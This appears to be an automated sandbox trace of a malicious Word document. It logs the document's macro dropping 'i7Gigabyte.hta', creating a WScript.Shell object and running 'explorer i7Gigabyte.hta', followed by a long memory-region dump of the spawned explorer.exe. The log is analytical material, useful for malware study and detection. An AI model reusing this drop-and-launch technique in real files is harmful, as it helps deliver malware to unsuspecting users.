[0064.329] _wfullpath (in: _Buffer=0x30a784, _Path="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", _BufferCount=0x104 | out: _Buffer="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta"
[0064.329] lstrcmpiW (lpString1="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc") returned 1
[0064.349] free (_Block=0x8e6ffb0)
[0064.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="I7Gigabyte", cchWideChar=-1, lpMultiByteStr=0x8e6ffb0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="I7Gigabyte", lpUsedDefaultChar=0x0) returned 11
[0064.365] GetAsyncKeyState (vKey=3) returned 0
[0064.366] CRetailMalloc_Alloc () returned 0x949e58
[0064.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a514, cbMultiByte=8, lpWideCharStr=0x3850120, cchWideChar=18 | out: lpWideCharStr="category") returned 8
[0064.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a526, cbMultiByte=1, lpWideCharStr=0x38504d2, cchWideChar=4 | out: lpWideCharStr=" ") returned 1
[0064.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a534, cbMultiByte=3, lpWideCharStr=0x385069e, cchWideChar=8 | out: lpWideCharStr="wsc") returned 3
[0064.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a53c, cbMultiByte=7, lpWideCharStr=0x38506e2, cchWideChar=16 | out: lpWideCharStr="company") returned 7
[0064.367] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5c8a550, cbMultiByte=3, lpWideCharStr=0x3850ab2, cchWideChar=8 | out: lpWideCharStr="ell") returned 3
[0064.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x37f27fe, cbMultiByte=13, lpWideCharStr=0x317024, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13
[0064.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36128ce, cbMultiByte=13, lpWideCharStr=0x317084, cchWideChar=14 | out: lpWideCharStr="CreateObject") returned 13
[0064.369] SysStringByteLen (bstr="") returned 0x0
[0064.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x316f40, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x9b¤\x97f", lpUsedDefaultChar=0x0) returned 0
[0064.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x6ee3c74, cbMultiByte=0, lpWideCharStr=0x3850d2e, cchWideChar=2 | out: lpWideCharStr="") returned 0
[0064.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x36128fa, cbMultiByte=6, lpWideCharStr=0x316e38, cchWideChar=5 | out: lpWideCharStr="exec") returned 0
[0064.370] wcscpy_s (in: _Destination=0x6e997e4, _SizeInWords=0x5, _Source="exec" | out: _Destination="exec") returned 0x0
[0064.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x66b5ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9
[0064.371] CRetailMalloc_Realloc () returned 0x5bc6360
[0064.371] CRetailMalloc_Realloc () returned 0x949e58
[0064.371] CRetailMalloc_Free () returned 0x1c20001
[0064.371] GetCurrentProcess () returned 0xffffffff
[0064.371] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2c, dwSize=0x14) returned 1
[0064.371] VirtualProtect (in: lpAddress=0x6e97b2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0064.372] GetCurrentProcess () returned 0xffffffff
[0064.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b2d, dwSize=0x2) returned 1
[0064.372] GetCurrentProcess () returned 0xffffffff
[0064.372] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4c, dwSize=0x14) returned 1
[0064.372] VirtualProtect (in: lpAddress=0x6e97b4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0064.373] GetCurrentProcess () returned 0xffffffff
[0064.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b4d, dwSize=0x2) returned 1
[0064.373] GetCurrentProcess () returned 0xffffffff
[0064.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6c, dwSize=0x14) returned 1
[0064.373] VirtualProtect (in: lpAddress=0x6e97b6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0064.373] GetCurrentProcess () returned 0xffffffff
[0064.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b6d, dwSize=0x2) returned 1
[0064.373] GetCurrentProcess () returned 0xffffffff
[0064.373] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8c, dwSize=0x14) returned 1
[0064.373] VirtualProtect (in: lpAddress=0x6e97b8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x316f4c | out: lpflOldProtect=0x316f4c*=0x40) returned 1
[0064.374] GetCurrentProcess () returned 0xffffffff
[0064.374] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x6e97b8d, dwSize=0x2) returned 1
[0064.374] SetErrorMode (uMode=0x8001) returned 0x8001
[0064.374] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1
[0064.374] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x66920000
[0064.374] SetErrorMode (uMode=0x8001) returned 0x8001
[0064.375] GetProcAddress (hModule=0x66920000, lpProcName=0x2cc) returned 0x66b14f87
[0064.376] GetAsyncKeyState (vKey=3) returned 0
[0064.497] GetAsyncKeyState (vKey=3) returned 0
[0064.721] GetAsyncKeyState (vKey=3) returned 0
[0064.721] VarAdd (in: pvarLeft=0x317840, pvarRight=0x317830, pvarResult=0x317820 | out: pvarResult=0x317820) returned 0x0
[0064.721] VarAdd (in: pvarLeft=0x317820, pvarRight=0x317abc, pvarResult=0x317800 | out: pvarResult=0x317800) returned 0x0
[0064.951] GetAsyncKeyState (vKey=3) returned 0
[0064.951] VarAdd (in: pvarLeft=0x3177c0, pvarRight=0x3177d0, pvarResult=0x3177b0 | out: pvarResult=0x3177b0) returned 0x0
[0064.951] VarAdd (in: pvarLeft=0x3177b0, pvarRight=0x3177a0, pvarResult=0x317790 | out: pvarResult=0x317790) returned 0x0
[0064.951] CLSIDFromProgIDEx (in: lpszProgID="wscript.shell", lpclsid=0x3176f8 | out: lpclsid=0x3176f8*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0
[0064.959] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0064.959] CoCreateInstance (in: rclsid=0x3176f8*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x66b38088*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x3176c8 | out: ppv=0x3176c8*=0x8840ba4) returned 0x0
[0066.428] WshShell:IUnknown:QueryInterface (in: This=0x8840ba4, riid=0x66b46898*(Data1=0x7fd52380, Data2=0x4e07, Data3=0x101b, Data4=([0]=0xae, [1]=0x2d, [2]=0x8, [3]=0x0, [4]=0x2b, [5]=0x2e, [6]=0xc7, [7]=0x13)), ppvObject=0x3176cc | out: ppvObject=0x3176cc*=0x0) returned 0x80004002
[0066.428] WshShell:IUnknown:QueryInterface (in: This=0x8840ba4, riid=0x66b468a8*(Data1=0x37d84f60, Data2=0x42cb, Data3=0x11ce, Data4=([0]=0x81, [1]=0x35, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xb8, [7]=0x51)), ppvObject=0x3176d0 | out: ppvObject=0x3176d0*=0x0) returned 0x80004002
[0066.428] WshShell:IUnknown:QueryInterface (in: This=0x8840ba4, riid=0x66b380a8*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x3176d4 | out: ppvObject=0x3176d4*=0x8840b90) returned 0x0
[0066.428] WshShell:IUnknown:Release (This=0x8840ba4) returned 0x1
[0066.428] WshShell:IDispatch:GetIDsOfNames (in: This=0x8840b90, riid=0x66b38098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x317750*="exec", cNames=0x1, lcid=0x409, rgDispId=0x317754 | out: rgDispId=0x317754*=3012) returned 0x0
[0066.439] WshShell:IDispatch:Invoke (in: This=0x8840b90, dispIdMember=3012, riid=0x66b38098*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x317728*(rgvarg=([0]=0x31775c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer i7Gigabyte.hta", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x317708, puArgErr=0x317738 | out: pDispParams=0x317728*(rgvarg=([0]=0x31775c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="explorer i7Gigabyte.hta", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x317708*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x317738*=0x0) returned 0x0
[0067.976] WshShell:IUnknown:Release (This=0x8840b90) returned 0x0
[0067.978] GetAsyncKeyState (vKey=3) returned 0
Thread:
id = 14
os_tid = 0xdd0
Thread:
id = 15
os_tid = 0xe1c
Thread:
id = 17
os_tid = 0xe50
Thread:
id = 35
os_tid = 0xeac
Thread:
id = 97
os_tid = 0xf54
Thread:
id = 127
os_tid = 0xfb0
Process:
id = "2"
image_name = "explorer.exe"
filename = "c:\\windows\\syswow64\\explorer.exe"
page_root = "0x40310000"
os_pid = "0xe48"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xd5c"
cmd_line = "explorer i7Gigabyte.hta"
cur_dir = "C:\\Users\\kEecfMwgj\\Documents\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 665
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 666
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 667
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 668
start_va = 0x90000
end_va = 0xcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000090000"
filename = ""
Region:
id = 669
start_va = 0x170000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000170000"
filename = ""
Region:
id = 670
start_va = 0x290000
end_va = 0x510fff
monitored = 0
entry_point = 0x2c0efa
region_type = mapped_file
name = "explorer.exe"
filename = "\\Windows\\SysWOW64\\explorer.exe" (normalized: "c:\\windows\\syswow64\\explorer.exe")
Region:
id = 671
start_va = 0x77800000
end_va = 0x779a8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 672
start_va = 0x779e0000
end_va = 0x77b5ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 673
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 674
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 675
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 676
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 677
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 678
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 679
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 684
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 685
start_va = 0x60000
end_va = 0x61fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 686
start_va = 0x700000
end_va = 0x77ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000700000"
filename = ""
Region:
id = 687
start_va = 0x75250000
end_va = 0x75257fff
monitored = 0
entry_point = 0x752520f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 688
start_va = 0x75260000
end_va = 0x752bbfff
monitored = 0
entry_point = 0x7529f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 689
start_va = 0x752c0000
end_va = 0x752fefff
monitored = 0
entry_point = 0x752ee088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 690
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 691
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 692
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 0
entry_point = 0x776f5340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 693
start_va = 0x776e0000
end_va = 0x777fefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000776e0000"
filename = ""
Region:
id = 694
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 0
entry_point = 0x775fa2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 695
start_va = 0x775e0000
end_va = 0x776d9fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000775e0000"
filename = ""
Region:
id = 696
start_va = 0x780000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 697
start_va = 0x769b0000
end_va = 0x76abffff
monitored = 0
entry_point = 0x769c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 698
start_va = 0x76fe0000
end_va = 0x77026fff
monitored = 0
entry_point = 0x76fe74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 699
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 700
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 701
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 702
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 703
start_va = 0x76c20000
end_va = 0x76cbffff
monitored = 0
entry_point = 0x76c349e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 704
start_va = 0x76cc0000
end_va = 0x76d6bfff
monitored = 0
entry_point = 0x76cca472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 705
start_va = 0x76900000
end_va = 0x76918fff
monitored = 0
entry_point = 0x76904975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 706
start_va = 0x75bc0000
end_va = 0x75caffff
monitored = 0
entry_point = 0x75bd0569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 707
start_va = 0x75530000
end_va = 0x7558ffff
monitored = 0
entry_point = 0x7554a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 708
start_va = 0x75520000
end_va = 0x7552bfff
monitored = 0
entry_point = 0x755210e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 709
start_va = 0x77240000
end_va = 0x772cffff
monitored = 0
entry_point = 0x77256343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 710
start_va = 0x773b0000
end_va = 0x774affff
monitored = 0
entry_point = 0x773cb6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 711
start_va = 0x75780000
end_va = 0x75789fff
monitored = 0
entry_point = 0x757836a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 712
start_va = 0x76ac0000
end_va = 0x76b5cfff
monitored = 0
entry_point = 0x76af3fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 713
start_va = 0x771d0000
end_va = 0x77226fff
monitored = 0
entry_point = 0x771e9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 714
start_va = 0x75cb0000
end_va = 0x768f9fff
monitored = 0
entry_point = 0x75d31601
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 715
start_va = 0x76e80000
end_va = 0x76fdbfff
monitored = 0
entry_point = 0x76ecba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 716
start_va = 0x757f0000
end_va = 0x7587efff
monitored = 0
entry_point = 0x757f3fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 717
start_va = 0x73e30000
end_va = 0x73f9efff
monitored = 0
entry_point = 0x73e3d50e
region_type = mapped_file
name = "explorerframe.dll"
filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll")
Region:
id = 719
start_va = 0x74170000
end_va = 0x7419efff
monitored = 0
entry_point = 0x7417c7a2
region_type = mapped_file
name = "duser.dll"
filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll")
Region:
id = 720
start_va = 0x740b0000
end_va = 0x74161fff
monitored = 0
entry_point = 0x741016fd
region_type = mapped_file
name = "dui70.dll"
filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll")
Region:
id = 721
start_va = 0x20000
end_va = 0x21fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 722
start_va = 0x76b90000
end_va = 0x76beffff
monitored = 0
entry_point = 0x76ba158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 723
start_va = 0x774b0000
end_va = 0x7757bfff
monitored = 0
entry_point = 0x774b168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 724
start_va = 0x74460000
end_va = 0x744dffff
monitored = 0
entry_point = 0x744737c9
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")
Region:
id = 725
start_va = 0x664a0000
end_va = 0x664c4fff
monitored = 0
entry_point = 0x664a2b71
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 726
start_va = 0x77030000
end_va = 0x771ccfff
monitored = 0
entry_point = 0x770317e7
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll")
Region:
id = 727
start_va = 0x77580000
end_va = 0x775a6fff
monitored = 0
entry_point = 0x775858b9
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 728
start_va = 0x76bf0000
end_va = 0x76c01fff
monitored = 0
entry_point = 0x76bf1441
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll")
Region:
id = 729
start_va = 0x74410000
end_va = 0x74422fff
monitored = 0
entry_point = 0x74411d3f
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")
Region:
id = 730
start_va = 0x6eb50000
end_va = 0x6eb59fff
monitored = 0
entry_point = 0x6eb54d20
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll")
Region:
id = 731
start_va = 0x70910000
end_va = 0x70a9ffff
monitored = 0
entry_point = 0x709ad026
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll")
Region:
id = 732
start_va = 0x67ac0000
end_va = 0x67ac7fff
monitored = 0
entry_point = 0x67ac10e9
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")
Region:
id = 733
start_va = 0x73fa0000
end_va = 0x74094fff
monitored = 0
entry_point = 0x73fb0d9e
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll")
Region:
id = 734
start_va = 0x1b0000
end_va = 0x21ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 735
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 736
start_va = 0x520000
end_va = 0x6a7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000520000"
filename = ""
Region:
id = 737
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 738
start_va = 0x30000
end_va = 0x35fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "explorer.exe.mui"
filename = "\\Windows\\SysWOW64\\en-US\\explorer.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\explorer.exe.mui")
Region:
id = 739
start_va = 0x780000
end_va = 0x900fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000780000"
filename = ""
Region:
id = 740
start_va = 0x960000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000960000"
filename = ""
Region:
id = 741
start_va = 0xa60000
end_va = 0x1e5ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a60000"
filename = ""
Region:
id = 742
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 743
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 744
start_va = 0x140000
end_va = 0x15ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 745
start_va = 0x1e60000
end_va = 0x207ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e60000"
filename = ""
Region:
id = 746
start_va = 0x160000
end_va = 0x16cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "setupapi.dll.mui"
